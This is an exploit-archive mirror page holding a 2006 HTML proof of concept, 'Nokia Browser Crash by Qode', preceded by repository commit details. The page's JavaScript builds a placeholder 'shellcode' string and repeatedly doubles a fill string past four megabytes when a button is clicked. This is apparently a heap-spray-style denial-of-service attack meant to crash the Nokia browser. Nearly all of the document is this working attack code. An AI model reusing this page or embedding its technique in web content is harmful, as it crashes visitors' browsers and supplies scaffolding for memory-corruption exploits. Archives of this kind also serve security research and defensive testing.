exploit-db-mirror/exploits/hardware/dos/2176.html
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

37 lines
No EOL
539 B
HTML

<!--
Nokia Browser Crash by Qode
http://www.qode.org
-->
<html><body><script>
function crash()
{
alert('Nokia Browser Crash by Qode');
shellcode = unescape('%ucccc');
fill = unescape('%ucccc');
addr = 0x02020202;
var b = fill;
while (b.length <= 0x400000) b+=b;
}
</script>
Nokia Browser Crash by Qode<br>
<input type='button' onClick='crash()' value='Crash'>
</body></html>
# milw0rm.com [2006-08-13]